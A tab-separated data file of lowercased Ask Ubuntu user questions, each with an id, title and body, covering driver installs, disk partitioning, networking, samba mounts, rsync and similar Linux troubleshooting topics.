431915	ubuntu 12.04 ati driver	good day , so i just installed ubuntu 12.04 lts ( i 'm now to ubuntu and even linux systems , but i 've bored of the lot of brainfuck with windows systems ) so , i installed steam and then 2 games ( left 4 dead 2 and killing floor ) but then i realized both of them runs slow as hell ... i searched on google for what can cause this , and i found that it must be the graphics driver ... the system settings says it is `` unknown '' but according to 13.10 it might be the gallion 4.0 ( or something like this ) so , i want to install the official amd catalyst drivers ... but the problem is , every time i 'd like to install it push a sexy error to my face : `` some of the tools are missing '' i checked the .log file and it ca n't find the `` version.h '' for the kernel 3.11.0-18-generic ( before i pudated the system programs it said 3.11.0-15-generic ) so , i checked it , the 3.11.0-15 have the version.h inside , but the 18 does not ... i could not find any solution in google , somebody maybe can help me how to fix this ...
431918	disk partioning	how many parts can i create in my hard disk.i have now 4 part 5 th part is not allowed . i will describe my partitions:104mb for windows system , 20.98gb for ubuntu , c , d for windows , but i also now have the fifth part ( 38 gb ) which is not formatted to anything.can i add that place for my ubuntu ( 33gb ) , and swap place ( 5gb ) .now i am using both windows and ubuntu without problem but that place is free and useless , and is shown black in windows partiton window .
431924	ubuntu stuck at splash screen - boxsync trouble	ubuntu stuck at splash screen . when i press esc , i see that it is stuck in a login loop for boxsync - asking for username for https : //dav.box.com/dav . but i am not able to enter anything . i am not able to switch to terminal mode as well . any help would be appreciated .
431925	how to restart apache2 when i get a pid conflict ?	i receive the same message than explained in this thread when i 'm trying to restart apache2 : * restarting web server apache2 [ fail ] * there are processes named 'apache2 ' running which do not match your pid file which are left untouched in the name of safety , please review the situation by hand . but the problem is that i do n't have any file inside /var/run/apache2 . the command pidof apache2 returns : 1274 i do n't know if it will help but here is the line in apache2.conf : pidfile $ { apache_pid_file } and the one in envvars : export apache_pid_file=/var/run/apache2/apache2 $ suffix.pid should i manually create a .pid file inside /var/run/apache2 ? thank you very much !
431928	is it possible to install software from google play in samsung galaxy chat from ubuntu ?	i 'd want to install some apps in my mobile and have n't wifi or 3g here , is it possible connecting it trough usb in ubuntu ? thanks .
431930	installing ubuntu gnome dual boot on sony vaio pro , efi problems	i recently bought a sony vaio pro 13 and after witnessing the horror that in windows 8 , i decided to attempt to install ubuntu gnome 13.10 as a dual boot option . during the install process i partitioned 2 drives : for the ubuntu root mount and the swap area . the installation went fine and i restarted without the liveusb , however the laptop booted directly into win 8 . the install guide said i should see a grub menu but i did n't . after restarting back into the liveusb i ran the boot-repair utility using the recommended settings and then restarted . now the laptop will not even boot into windows , i get an `` operating system not found error '' in both uefi and legacy modes . here is my boot-repair log : http : //paste.ubuntu.com/7064164/ i know there are some issues with the ssd and i have found info on how to fix this , providing you can at least boot to grub , which i ca n't ? ! any help is appreciated , i am worried i have bricked this brand new laptop . thanks !
431932	why 'sudo service networking restart '' do not work ?	normally , if i run sudo service networking restart , it will take some time before it finishes . but , on one machine , it returns immediately , and the results in ifconfig does not change even when /etc/network/interfaces is changed . then i have to restart the machine in order to load any changes in the interfaces file . i 'm wondering how to debug this problem . my os is ubuntu server 13.10 .
431933	how can i find out what is causing constant chromium-browser disk writes ?	problem : iotop shows small disk writes every 4-5 seconds from chromium . example output total disk read : 0.00 b/s | total disk write : 0.00 b/s tid prio user disk read disk write swapin io command 258 be/3 root 0.00 b 108.00 k 0.00 % 0.19 % [ jbd2/sda6-8 ] 7541 be/4 kevin 0.00 b 32.00 k 0.00 % 0.01 % chromium-browser 7545 be/4 kevin 0.00 b 8.00 k 0.00 % 0.00 % chromium-browser 15042 be/4 root 0.00 b 64.00 k 0.00 % 0.00 % python /usr/sbin/iotop -bao 7547 be/4 kevin 0.00 b 12.00 k 0.00 % 0.00 % chromium-browser things i 've been able to find out so far : running iotop with the -p option indicates that it is the actual browser process doing the io , as opposed to an extension or a tab jbd2 and chromium-browser writes almost invariably occur together , and closing chromium gets rid of the jbd2 writes , so i 'm assuming they are secondary to chromiums io . in a new browser window , with no tabs open , there are no more writes things i 've tried which have n't worked : disabling all extensions : no joy killing shockwave flash : funnily enough , this seemed to work on one occasion , but has no effect anymore . relocating chromiums cache directory to a tmpfs ! i was sure this would help , but it has not ... adding commit=600 to the drives entry in fstab ( in an attempt to mitigate the problem when i thought jbd2 was the problem ) . did n't work . any ideas ?
431934	how do i mount a second hard drive ?	my laptop has a 32gb ssd on which i 've installed ubuntu , and a 500gb hdd where i plan to store my files . when i try to download big files ( like blu ray movies ) it says it ca n't because my hdd is not big enough . how do i tell the os that it can use the free 500gb on the other drive ?
431937	how do i move boot to a new msata drive	i purchased an msata drive that i 'm going to install into my thinkpad x230 . in my current setup , i have two partitions : a boot+os partition sda1 and /home ( sda2 ) . i ant to move everything from sda1 to the msata drive and be able to boot from it . when that ' done , i want to expand sda2 to take over the free disk space on the drive . what 's the best way to do this ?
431938	how to install gnome 3.10 to ubuntu 12.04	please tell me how to install the latest gnome in ubuntu 12.04 ? i tried , but had installed the very old version 3.4 . please tell me how to install the latest version ?
431941	apt-get update throws 404s on natty-backports but it is n't in my sources.list	i 'm trying to upgrade my 13.04 to 13.10 in anticipation to 14.04 . however , the dist-upgrade fails as there is a 404 on a repository . that repository is the `` natty-backports '' . it 's normal , as it 's very old . however , i can not find any connections to that repository . when i grep the /etc/apt/sources.list it is n't there . when i look through the sources.list.d/ directory files , it also does n't show up there . when i ctrl+f `` natty '' in the software center sources window , it does n't show up . it 's like a ghost repository . i tried doing a sudo apt-get clean & & sudo apt-get update , but that did n't help either . when i do these commands , i make sure the software center is closed . is there some other directory/file apt-get gets its sources from ?
431942	what software can i use to make a mirror image of ubuntu ?	i used to use easeus todo for windows , or norton ghost . what options do i have for linux ?
431943	if i install ubuntu on an external drive using wubi , does it do anything to my c : drive ?	hello ubuntu community ! i have installed ubuntu using wubi on my old computer and broke windows ( i had to re-install it ) . so excuse me if i am acting paranoid . i was all ready to install ubuntu using wubi then it hit me . would wubi install grub on my c : or my installation drive ( f : ) . i will take any form of answer . i really need help !
431945	change the way jovie speaks time	is there a way to edit the text jovie reads to speak time . for example it says `` it is 2:00 o clock '' . how can i change it to `` local time 2:00 o'clock '' ? or how can i change `` it is twenty three o clock '' to `` it is 11:00 pm '' ?
431946	headphone noise when no sound is played	i have an asus k50ij laptop with ubuntu 12.04 on it , and with the following hardware : after typing : sudo aplay -l **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : vt1708s analog [ vt1708s analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 2 : vt1708s alt analog [ vt1708s alt analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 my codec called : via vt1708s every time when a sound is played , i hear an annoying noise , similar to white noise . the worst part is that it does n't stop after the sound is over . i googled for it thousands of times , tried every setup of alsamixer , but nothing works . i found on a forum , that because of the integrated soundcard on the motherboard , it may be the static earth noise from the electric network . i removed my laptop charger ( from the laptop ) and after 2-3 seconds the sound just stopped . when i plugged it back , it does n't come back until i play another sound .
431949	cant install ubuntu 12.04 lts	i have a new lenovo laptop i am trying to install ubuntu 12.04.4 lts on . i downloaded the iso and burned a dvd from it . if i boot the laptop from the dvd , it seems to boot up fine . i get the desk top and the ethernet works ( i am writing question from that desktop ) . but when i click `` install ubuntu 12.04.4 lts '' and click continue from the welcome screen and then click continue from the `` preparing to install ubuntu '' it hangs forever . i had previously installed suse linux on this laptop , but suse did n't recognize the ethernet , so i decided to try ubuntu instead . only reason i mention this is the laptop does not have windows on it now . i has ext4 partitions from the suse install and i am fine with the ubuntu install rewriting the whole disk . other posters recommend reformatting the disk using the disk utility , but when i attempt to format the disk it fails with : error creating partition table : helper exited with exit code 1 : in part_create_partition_table : device_file=/dev/sda , scheme=0 got it got disk committed to disk blkrrpart ioctl failed for /dev/sda : device or resource busy so i figure i have to unmount something , maybe ? except nothing on this disk seems to be mounted : ubuntu @ ubuntu : ~ $ mount /cow on / type overlayfs ( rw ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) /dev/sr0 on /cdrom type iso9660 ( ro , noatime ) /dev/loop0 on /rofs type squashfs ( ro , noatime ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) tmpfs on /tmp type tmpfs ( rw , nosuid , nodev ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) gvfs-fuse-daemon on /home/ubuntu/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=ubuntu ) ubuntu @ ubuntu : ~ $ i 'm stumped as to how to proceed . advice welcome , jeff haran update on 3-10-2014 , in response to question about type of system ; its a lenovo g500 15.6-inch laptop . the amazon site i bought it from describes it like so : intel core i5 3230m 2.6 ghz ( 3 mb cache ) 4 gb ddr3 500 gb 5400 rpm hard drive 15.6-inch screen , intel hd 4000 graphics i do n't think the problem is one of hardware compatibility . if i boot the system from from the dvd ( as opposed to trying to install from the dvd ) , it seems to work fine ( not sure about the wireless yet ) . it just seems that the install gets confused because it already has an ext4 file system from the suse distro i installed on it previously . other posters have referred to similar problems when installing this version of ubuntu on systems that did n't have windows on them and their fixes seemed to involve deleting partitions first or reformatting the disk drive . but when i try to reformat the disk drive as suggested using the disk utility , i get the errors described above .
431951	ubuntu 13.10 : no bluetooth adapter found	i do n't understand why my bluetooth device has disappeared and wo n't connect . this is for my system76 kudu professional . here 's the output for code : sudo lspci 00:00.0 host bridge : intel corporation xeon e3-1200 v3/4th gen core processor dram controller ( rev 06 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v3/4th gen core processor pci express x16 controller ( rev 06 ) 00:02.0 vga compatible controller : intel corporation 4th gen core processor integrated graphics controller ( rev 06 ) 00:03.0 audio device : intel corporation xeon e3-1200 v3/4th gen core processor hd audio controller ( rev 06 ) 00:14.0 usb controller : intel corporation 8 series/c220 series chipset family usb xhci ( rev 05 ) 00:16.0 communication controller : intel corporation 8 series/c220 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 8 series/c220 series chipset high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 1 ( rev d5 ) 00:1c.1 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 2 ( rev d5 ) 00:1c.2 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 3 ( rev d5 ) 00:1c.3 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 4 ( rev d5 ) 00:1d.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm86 express lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 8 series/c220 series chipset family 6-port sata controller 1 [ ahci mode ] ( rev 05 ) 00:1f.3 smbus : intel corporation 8 series/c220 series chipset family smbus controller ( rev 05 ) 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5229 pci express card reader ( rev 01 ) 04:00.0 network controller : intel corporation wireless 7260 ( rev 73 ) 05:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5289 ( rev 01 ) 05:00.2 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 0a )
431959	`` sudo : must be setuid root '' error after login to diskless client	i 'm working on diskless linux clusters . i followed instructions as described here . i did these steps : 1- installed a pxe server on server pc . 2- installed ubuntu to a client pc . 3- configured and installed all programs i need on client pc . 4- copied all os files ( on client pc ) to nfs share point . 5- booted diskless pc via pxe server . it works . but after login to my account , i got this error message : `` sudo : must be setuid root '' . so i ca n't use /usr/bin/sudo . how can i fix this ? do i need to change some files on os files which i copied to pxe server ?
431960	how can i install chromium browser ?	i installed trusty 14.04 . during the installation there were readouts that stated i could install chromium web browser after the installation finished . i can not find the chromium web browser anywhere . please advise .
431961	serial-port thermal printer communication	i am trying to establish low level communication with an epson tm-t88iv thermal printer via shell but i ca n't figure it out . i 'm working on ubuntu 13.10 64 bit with a dell vostro 1510 . i have it connected through a prolific serial-usb pl2303 cable . lsusb shows : ben @ ben-vostro1510 : ~ $ lsusb bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 003 : id 046d : c52b logitech , inc. unifying receiver bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 005 : id 067b:2303 prolific technology , inc. pl2303 serial port bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 0c45:63e0 microdia sonix integrated webcam bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub dmesg | grep tty shows : ben @ ben-vostro1510 : ~ $ dmesg | grep tty [ 0.000000 ] console [ tty0 ] enabled [ 1.488664 ] tty tty28 : hash matches [ 225.882444 ] cdc_acm 2-4:1.0 : ttyacm0 : usb acm device [ 1478.741395 ] usb 5-1 : pl2303 converter now attached to ttyusb0 [ 3672.537405 ] pl2303 ttyusb0 : pl2303 converter now disconnected from ttyusb0 [ 3679.219805 ] usb 5-1 : pl2303 converter now attached to ttyusb0 [ 4657.704772 ] pl2303 ttyusb0 : pl2303 converter now disconnected from ttyusb0 [ 4699.905633 ] usb 5-1 : pl2303 converter now attached to ttyusb0 [ 4798.952739 ] pl2303 ttyusb0 : pl2303 converter now disconnected from ttyusb0 [ 9930.266470 ] usb 5-1 : pl2303 converter now attached to ttyusb0 i have tried using cutecom to send a specific hexadecimal code to it , but i get no answer . i also tried echoing to /dev/ttyusb0 but i do n't know where to read the response from . i also tried `` sudo cat /dev/ttyusb0 '' but get nothing . please help me solve this ! thanks ! solution : i had to run sudo chmod 777 /dev/ttyusb0 and then run jpnevulator as root sudo jpnevulator -- tty /dev/ttyusb0 -- read and then using another in write mode i wrote the status check sequence 02 ac 00 01 1c 00 00 03 30 30 43 45 and got the printer 's response on screen . i now have a different problem with the checksum , but that 's for the next episode of my odyssey into low-level programming .
431963	problems loging in after dealing with video drivers and black screen	i recently installed ubuntu 13.10 on my laptop alongside windows 8.1 . i have a nvidia geforce gt 645m video card on it and was having black screen on boot issues . so i installed the xorg-edgers nvidia drivers . after this fix i could get to the login screen , however whenever i would try to log in i get blank desktop screen with no interface and a warning saying `` system program problem detected do you want to report the problem now ? '' and if i log in as a guest i get a desktop screen with no interface .
431966	build libav from git using -- enable-*	i need to get a newer version of libav-tools ( containing avconv ) to get the aac-encoder to resample an input 6-channel audio stream into an output 2-channel one . i successfully built the package , but i realized after that i needed to ./configure -- enable-libvo-aacenc to get avconvto use aac as an encoder . here 's what i 'm trying to do : git clone git : //git.libav.org/libav.git sudo apt-get build-dep libav-tools cd libav ./configure -- enable-libvo-aacenc -- enable-gpl -- enable-nonfree -- enable-version3 make sudo make install but i have this instead : i do n't understand what i 'm doing wrong here ... i ca n't seem to use the libraries that are installed on my ubuntu .
431970	is there a good ocr-readable font	as part of my backups , i would like to be able to print and later re-scan a base64-encoded copy of my private key . unfortunately , neither gocr nor tesseract seems to be able to properly read any font that i throw at them . i have tried times new roman , courier new , and ocr-a . are there any other fonts i should try ?
431973	how do i install amd legacy drivers in ubuntu 13.10 ?	i am new to ubuntu and would like to know how i can install amd graphic drivers ? also do i need to manually uninstall the open-source drivers in use right now ?
431975	i installed ubuntu updates and wifi doesnt work anymore	i am working on a dell machine and wifi didnt work out of the box but i was able to get it to work . after doing updates the network appears in the place where you can edit connections but there is no way to connect . when i first installed ubuntu i successfully tried this to get the wifi to work : installing broadcom wireless drivers . . today i updated my system using the software updater . now when i click on the network indicator in the top panel it just shows wired network disconnected and no wireless networks at all , like it used to . when i click edit connections i can find `` a network '' but i can not connect just edit it . i did what was in the link again and still no wifi . what do i do ? please be as specific as possible , i am new to ubuntu . edit - i answered the post with 59^ and it is a dell latitude d620 and i am using ubuntu 12.04 lts and nothing happens when i type those codes . i tried putting sudo in front of them also and still , nothing happened ...
431977	slow file transfer on a local network	network topology whenever i try to transfer files within the local network with scp i ca n't reach speeds above 2mb/s , in both direction ( server -- - > laptop or laptop -- - > server ) . same with ftp . i noticed that the data transfer starts at 2.5 [ mb/s ] and then quickly drops down to 500 [ kb/s ] after a few seconds . the transfer from the server to the laptop is slightly faster ( 3mb/s instead of 2mb/s ) . i would expect the speed to be at least 25mb/s since it is a pure local data transfer . fyi , some meaningful outputs : on the server : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:13 : d3 : cd:8a:7b inet adr:192.168.1.246 bcast:192.168.1.255 masque:255.255.255.0 adr inet6 : fe80 : :213 : d3ff : fecd:8a7b/64 scope : lien up broadcast running multicast mtu:1492 metric:1 packets reçus:34893 erreurs:0 :2 overruns:0 frame:0 tx packets:45145 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 lg file transmission:1000 octets reçus:19810274 ( 19.8 mb ) octets transmis:57877746 ( 57.8 mb ) lo link encap : boucle locale inet adr:127.0.0.1 masque:255.0.0.0 adr inet6 : : :1/128 scope : hôte up loopback running mtu:65536 metric:1 packets reçus:36 erreurs:0 :0 overruns:0 frame:0 tx packets:36 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 lg file transmission:0 octets reçus:2160 ( 2.1 kb ) octets transmis:2160 ( 2.1 kb ) : ~ $ sudo ethtool eth0 settings for eth0 : supported ports : [ tp mii ] supported link modes : 10baset/half 10baset/full 100baset/half 100baset/full supported pause frame use : no supports auto-negotiation : yes advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full advertised pause frame use : no advertised auto-negotiation : yes link partner advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full link partner advertised pause frame use : no link partner advertised auto-negotiation : yes speed : 100mb/s duplex : full port : mii phyad : 1 transceiver : internal auto-negotiation : on supports wake-on : pumbg wake-on : d current message level : 0x00000000 ( 0 ) link detected : yes on the laptop $ ifconfig eth0 link encap : ethernet hwaddr 00:21 : cc : d3:8d:67 up broadcast multicast mtu:1500 metric:1 packets reçus:0 erreurs:0 :0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 lg file transmission:1000 octets reçus:0 ( 0.0 b ) octets transmis:0 ( 0.0 b ) interruption:20 mémoire : f2500000-f2520000 lo link encap : boucle locale inet adr:127.0.0.1 masque:255.0.0.0 adr inet6 : : :1/128 scope : hôte up loopback running mtu:16436 metric:1 packets reçus:1562 erreurs:0 :0 overruns:0 frame:0 tx packets:1562 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 lg file transmission:0 octets reçus:478231 ( 478.2 kb ) octets transmis:478231 ( 478.2 kb ) wlan0 link encap : ethernet hwaddr 60:67:20 : bd:5e:4c inet adr:192.168.1.12 bcast:192.168.1.255 masque:255.255.255.0 adr inet6 : fe80 : :6267:20ff : febd:5e4c/64 scope : lien up broadcast running multicast mtu:1492 metric:1 packets reçus:161831 erreurs:0 :0 overruns:0 frame:0 tx packets:101552 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 lg file transmission:1000 octets reçus:195684887 ( 195.6 mb ) octets transmis:29360206 ( 29.3 mb ) sudo iwconfig wlan0 wlan0 ieee 802.11abgn mode : managed frequency:2.437 ghz access point : 00:26:4d:26 : a1:2d bit rate=54 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off link quality=52/70 signal level=-58 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:3791 missed beacon:0 do you know what could be the root cause of this crazy slowness ?
431978	how to start games in steam running on wine ?	i understand that not all games will be compatible with wine , but how do i start a game in steam while running steam on wine ? do i just press play ?
431979	sharing internet through a single wireless adaptor ; windows can ubuntu ca n't ?	i 've been searching this for a long time . apperantly , the only way is demostrated here . it takes a long time to set things up and requires experience with networks . i am ok with both . however it is somehow hardware dependent ! in order to run hostapd , the wireless adaptor must be supported . i thought this was a `` hard '' limitation . interestingly , in windows 7 an application called connectify does the job with few clicks . more interestingly in windows 8 and 8.1 it does n't even require an additional software . and even more insterestingly both does the job hardware independently and in 10 seconds . so i do n't think that the drivers or the hardware itself is the limitation here , anyone with a single wireless card can do that in windows . i can do more with my wireless card in linux such as putting it to monitor mode so i am wondering if noone did the coding for that yet or simply ubuntu does n't support it ? or is there a solution that does n't require console hacking and is robust that i am not aware ?
431980	how to fix backlight for dell inspiron on ubuntu 12.0.4 lts ?	i work on a dell inspiron laptop . the backlight is not working on ubuntu . is there any known issues like this with ubuntu on dell machines ? i 've tried some solutions such as changing grub like the following sample but still it 's not working . sudo gedit /etc/default/grub grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux_default= '' quiet splash acpi_backlight=vendor '' sudo update-grub also , i installed xbacklight , but i can only set a value for it once and then i have to restart if i want to decrease the backlight . can someone tell me how can i fix it , or what else i can try ?
431982	rsync is n't creating files or folders	i 'm still relatively new to ubuntu and linux . i 've got a windows machine with a das . i 've got about 5tb of data on it , and i want to use my server running 12.04 to back it up daily / weekly . i 've got a drobo attached to my server . i 'm mounting the network drive using : sudo mount -o username=username , password=******** //192.168.1.100/storage /mnt/storage everything mounts correctly and i can read and write files . the drobo mounts automatically at startup , and i can read and write files to it just fine . i 've used the cp command to copy files from the network drive to the drobo and everything works correctly . then i try rsync , and while rsync looks like it 's running correctly , nothing gets copied over . here 's the command i 'm using . sudo rsync -av -- delete /mnt/storage /media/drobo so after about 2-3 days of running ( like it 's actually copying ) , it says complete and yet no files were copied . i 've ran it on smaller folders with just a few files and nothing copies over . no folders , no files . is there something i 'm doing wrong here ? edit : as requested , the drobo is a 5d attached via usb 3.0 formatted as ntfs . here are the results of df -h. filesystem size used avail use % mounted on /dev/sda6 184g 6.8g 168g 4 % / udev 7.7g 4.0k 7.7g 1 % /dev tmpfs 3.1g 1.1m 3.1g 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 7.8g 160k 7.8g 1 % /run/shm /dev/sdb2 16t 5.4t 11t 34 % /media/drobo //192.168.1.101/storage 7.3t 5.2t 2.2t 71 % /mnt/storage brent
431984	editor with live preview for asciidoc	i 'm looking for something like retext , but for asciidoc . the closest i have found is this relatively complex solution ( or here ) involving ruby , guard , guard-shell , rb-inotify , asciidoctor , epiphany ( or another browser with livereload ) . i 'll do all that if it is the best option . but i was looking for just a simple solution , along the lines of a retext for asciidoc . i also heard that o'reilly has some tools ( e.g. , the atlas wiki interface ) , but i 'm not submitting my documents to o'reilly . ( atlas looks cool and i 'd consider using it if i could do so privately . ) anyone have another suggestion ?
431986	how can i trick pojo.com into working with the latest version of flash player on linux ?	i have flash 11.2.202.341 installed my ubuntu 13.10 , but pojo.com keeps giving me the error message your adobe flash player is out of date when i try to play a game on their website . i checked on adobe 's website and it appears that mine is the latest version for linux . i am running mozilla firefox 27 . are there any known workarounds for this problem , so i can play games on pojo.com without installing a virtual machine ?
431987	file sharing between an ubuntu 13.10 box and a windows 8.1 box	i can not for the life of me figure out how to make this work . i 've gone through innumerable tutorials and none have allowed me to share files between windows and ubuntu . what is the problem/solution ?
431990	where do i learn linux ? beginner	i 've just swapped over from windows to linux and i 'm loving it as it is beautiful and i think it 's much better to use . where do i go about learning the terminal/commands etc as i have just been pasting commands in from google and i feel a little noob-ish doing this . i have beginner programming knowledge so far , i am in progress of learning java , js and html5 .
431999	software & updates ; should i turn on canonical partners source ? source code ?	in software sources under the other software tab , there is an option of enabling `` canonical partners '' repository : software packaged by canonical for their partners . should i check `` source code '' as well ? what does that mean when that 's checked ?
432001	ubuntu starting in low resolution and keyboard and mouse not working	i just installed ubuntu on my 2010 mac mini , ( 2.1ghz intel core 2 duo , 4gb ram ) and at first it worked fine . then , after turning off the computer , when i powered it on again it logged in and displayed my desktop , but the resolution is really low and the mouse and keyboard stopped doing anything . how do i fix this ?
432003	guake disappears randomly on ubuntu 13.10	i use dual monitors with a static guake terminal on one while doing everything else on the other . guake will work for a seemingly random amount of time , and eventually disappear until i reboot or kill the process ( which loses any open tabs ) . i found a similar question , but it seems to be completely unrelated .
432007	usb/keyboard/mouse not recognized after update to 13.10 from 12.10	i just updated to 13.10 from 12.10 . on restarting , i was completely unable to use my keyboard or mouse through usb . i have no ps/2 devices to use . also , it said that i had been disconnected from my network even though i did not do anything to disconnect it myself . my network card is connected through pcie x1 . the usb worked in 12.10 and 12.04 and also works in the bios and before loading into the kernel , working when you hold shift to test ram or go into recovery mode . the kernel is by default 3.11.0-18 . reverting to 3.11.0-15 gives the same issue . booting into either recovery modes lets you load up the kernel but when the menu appears to start dpkg or other options such as networking the keyboard again fails to work . tested with tesoro durandal g1nl , cooler master storm spawn , and a dell keyboard and targus mouse of which i am unsure of the exact models , although they were not recently made . also of note is that it is not simply a problem with not being able to move the cursor . there is no cursor at all . ubuntu boots into a black screen , on which a cursor appears . the cursor flickers and then disappears . it then boots into the unity desktop , with no cursor . please help .
432008	all themes are not appearing in ubuntu 13.10	i a using ubuntu 13.10 and i can not see all available themes in either 'appearance ' or 'unity-tweak tool ' though i have many theme in /usr/share/themes ' directory . i do not have~/.themes` folder . do i need to create that folder and link something .
432011	zoom in/out by mouse wheel with compaz does n't work	i want to use zoom in and zoom out function by alt + mouse wheel . how to activate super+scroll to zoom ? i configured according to this answer , but it does n't work in my environment . this is my config panel . 無効 means `` invalid '' i 'm using ubuntu 12.04 in virtualbox . what can i do to enable zooming function ?
432012	how do i run install ubuntu 13.10 and keep windows at the same time ?	i burned the iso onto the disk and ran it . which option do i choose ? these are the only options i have : -erase disk and install ubuntu -encrypt the new ubuntu installation for installation . -use lvm with the new ubuntu installation . -something else .
432013	acer wireless is not working	i have ubuntu 12.04 on my acer travelmate 2300 , and i ca n't enable wireless or use the wireless switch . does anyone know how to turn on wifi on an acer travelmate 2300 using ubuntu 12.04 ? this is the first time i 've tried to use linux . i 've always used windows .
432019	volume control question	i have my computer setup through my tv through hdmi1 . if i am playing music in the audio player and then i switch my tv display to hdmi2 i can not use the change the music file or adjust the volume . i do know what settings through sound settings there are to change this . i am also running speakers directly to my motherboard so i am not using the hdmi output for my volume control . thanks in advance for any help .
432022	disable gnome ( compiz ) task switcher grouping	i 'm currently running gnome ( gnome shell 3.10.4 ; compiz ) on ubuntu . alt+tab does the expected ( and `` correct '' ) behavior of showing the task switcher , enabling to switch between current open applications . however , it groups multiple `` instances '' of the same application ( example , gnome-terminal ) and requires extra key presses to be able to switch between the instances . is there a way to disable the grouping behavior ? i 've looked around in ccsm and was unable to find anything of relevance . any hints you share would be highly appreciated !
432025	how to change a drive 's permissions if it 's owned by root ?	earlier i was trying to install steam on my 32 gb flash drive , because my hard drive is very small , but i could n't because it was fat formatted . so then i formatted it to ext 4 using gparted , and when i did that and went to install steam again , the drive was read only , and upon going to change it , it was owned by root . there is already a question like this here- changing permissions on a drive owned by root but the solution there is to create a root user , however that involves logging out which i can not do since my version of ubuntu ( xfce precise ) is running side by side ( dual booted ) on a chromebook ( hence the low hard drive space ) , which means that if i log out , it closes the ubuntu interface . so my question is this , how do i turn off read only if it is owned by root , without creating a new user ?
432027	13.10 - samba mount error : could not resolve address	basically , in ubuntu 13.10 i ca n't mount a shared folder via the terminal nor fstabs , yet can access the shared folder via nautilus and smbclient i recently upgraded from linux mint 15 to ubuntu 13.10 . i have a pc with a shared folder created via windows groups , that i could samba via a samba client from my old mint laptop . but now that i upgraded to ubuntu 13.10 , i ca n't seem to mount it . what seems weird to me , is that when using nautilus , i can access the shared folder just fine ( via `` browse network '' ) , and can also access it directly with smbclient , but i ca n't mount it with sudo mount , nor can set it to be automatically mounted at boot by adding the corresponding entry to fstab i 'll add more info . in my pc , i have windows 7 . the folder i 'm sharing is a specific drive ( `` d : '' in my case ) . like i said , when using nautilus i can open it and access it just fine . also , when i try using the samba client , i can also access it fine : smbclient `` //gonzalo-pc/disco d '' -u [ win7 user ] [ win7 user ] being my user from windows 7 in my pc by executing this command ( after introducing the password when it prompts me ) , i get the smb : > prompt , and by doing dir i can see every folder in my win7 `` d : '' drive , so it works . however , when i use the following command to try and mount it , it does n't work : sudo mount -t cifs `` //gonzalo-pc/disco d '' /mnt/share /mnt/share being a directory i created to set up the mount . when i execute the above command , i get the following error : mount error : could not resolve address for gonzalo-pc : unknown error i do n't know what is causing this , since i do n't see how the address `` gonzalo-pc '' can not be resolved , since it is resolved fine when accessing it via nautilus or smbclient moreover , i ca n't mount it by adding an entry to fstab either . the entry is the following one : //gonzalo-pc/disco\040d /mnt/share cifs username= [ win7 user ] , credentials=/home/gonzalo /.smbcredentials , uid= [ ubuntu user ] , nbrl 0 0 i have a file at ~/.smbcredentials with the following format : username= [ win7 user ] password= [ win7 password ] i am not sure exactly what is going wrong . in my previous linux mint installation , i followed similar steps and could mount it ( the exact same shared folder ) fine .
